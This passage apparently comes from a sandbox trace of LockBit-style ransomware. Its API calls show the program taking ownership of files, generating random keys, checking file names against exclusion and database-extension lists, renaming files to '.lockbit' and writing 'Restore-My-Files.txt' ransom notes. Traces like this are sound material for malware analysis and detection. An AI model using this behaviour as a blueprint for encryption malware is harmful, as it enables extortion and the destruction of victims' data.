SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0097.229] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0097.230] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0097.230] CloseHandle (hObject=0x13e4) returned 1 [0097.230] free (_Block=0x77d800) [0097.231] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\softedges.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0097.231] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.231] malloc (_Size=0x40068) returned 0x1ff1e60 [0097.231] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=27691) returned 1 [0097.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0097.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0097.237] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0097.239] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.239] malloc (_Size=0xac) returned 0x77d800 [0097.239] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xac, FileInformationClass=0xa) returned 0x0 [0097.240] free (_Block=0x77d800) [0097.240] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0097.240] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0097.240] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.240] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f897678, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f897678, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdcdf, dwReserved0=0x0, dwReserved1=0x0, cFileName="vignettemask25.png", cAlternateFileName="")) returned 1 [0097.240] lstrcmpiW (lpString1=".", lpString2="vignettemask25.png") returned -1 [0097.240] lstrcmpiW (lpString1="..", lpString2="vignettemask25.png") returned -1 [0097.240] PathFindExtensionW (pszPath="vignettemask25.png") returned=".png" [0097.240] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0097.240] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0097.240] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0097.241] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0097.241] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0097.241] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0097.241] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0097.241] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0097.242] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0097.242] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0097.242] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0097.242] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0097.242] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0097.242] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0097.242] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="vignettemask25.png") returned -1 [0097.242] lstrcmpiW (lpString1="ntldr", lpString2="vignettemask25.png") returned -1 [0097.242] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="vignettemask25.png") returned -1 [0097.242] lstrcmpiW (lpString1="bootsect.bak", lpString2="vignettemask25.png") returned -1 [0097.242] lstrcmpiW (lpString1="autorun.inf", lpString2="vignettemask25.png") returned -1 [0097.242] lstrcmpiW (lpString1="thumbs.db", lpString2="vignettemask25.png") returned -1 [0097.242] lstrcmpiW (lpString1="iconcache.db", lpString2="vignettemask25.png") returned -1 [0097.242] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0097.243] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png") returned=".png" [0097.243] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0097.243] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0097.243] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0097.243] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0097.243] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0097.244] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0097.244] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0097.244] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0097.244] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0097.244] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0097.244] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0097.244] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png.lockbit") returned 80 [0097.244] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\vignettemask25.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.246] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0097.247] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0097.247] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0097.249] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0097.250] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0097.250] RtlFreeAnsiString (AnsiString="\\") [0097.250] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x330) returned 0x0 [0097.250] malloc (_Size=0x200) returned 0x77d800 [0097.250] NtQueryInformationToken (in: TokenHandle=0x330, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0097.250] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0097.250] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0097.251] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0097.251] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0097.252] CloseHandle (hObject=0x330) returned 1 [0097.252] free (_Block=0x77d800) [0097.252] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\vignettemask25.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0097.252] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.252] malloc (_Size=0x40068) returned 0x3df0008 [0097.252] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=56543) returned 1 [0097.252] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.255] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0097.255] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0097.258] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0097.268] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.268] malloc (_Size=0xb6) returned 0x77d800 [0097.268] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0097.269] free (_Block=0x77d800) [0097.269] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0097.269] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0097.269] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.269] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="whiteband.png", cAlternateFileName="")) returned 1 [0097.269] lstrcmpiW (lpString1=".", lpString2="whiteband.png") returned -1 [0097.269] lstrcmpiW (lpString1="..", lpString2="whiteband.png") returned -1 [0097.269] PathFindExtensionW (pszPath="whiteband.png") returned=".png" [0097.269] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0097.270] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0097.270] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0097.270] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0097.270] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0097.271] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0097.271] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0097.271] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0097.271] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0097.271] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0097.271] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0097.271] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0097.271] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0097.272] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0097.272] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0097.272] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0097.272] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0097.272] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="whiteband.png") returned -1 [0097.272] lstrcmpiW (lpString1="ntldr", lpString2="whiteband.png") returned -1 [0097.272] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="whiteband.png") returned -1 [0097.272] lstrcmpiW (lpString1="bootsect.bak", lpString2="whiteband.png") returned -1 [0097.272] lstrcmpiW (lpString1="autorun.inf", lpString2="whiteband.png") returned -1 [0097.272] lstrcmpiW (lpString1="thumbs.db", lpString2="whiteband.png") returned -1 [0097.272] lstrcmpiW (lpString1="iconcache.db", lpString2="whiteband.png") returned -1 [0097.272] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0097.272] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png") returned=".png" [0097.272] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0097.272] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0097.272] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0097.272] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0097.272] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0097.272] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0097.272] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0097.272] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0097.273] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0097.273] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0097.273] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0097.273] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0097.273] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0097.273] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0097.273] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0097.273] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0097.273] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png.lockbit") returned 75 [0097.273] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\whiteband.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.275] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0097.277] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0097.277] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0097.278] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0097.279] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0097.279] RtlFreeAnsiString (AnsiString="\\") [0097.280] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1194) returned 0x0 [0097.280] malloc (_Size=0x200) returned 0x77d800 [0097.280] NtQueryInformationToken (in: TokenHandle=0x1194, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0097.280] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0097.280] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0097.280] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0097.281] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0097.281] CloseHandle (hObject=0x1194) returned 1 [0097.281] free (_Block=0x77d800) [0097.281] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\whiteband.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0097.281] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.281] malloc (_Size=0x40068) returned 0x3ef0008 [0097.281] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=7261) returned 1 [0097.281] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0097.284] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0097.287] ReadFile (in: hFile=0x1194, 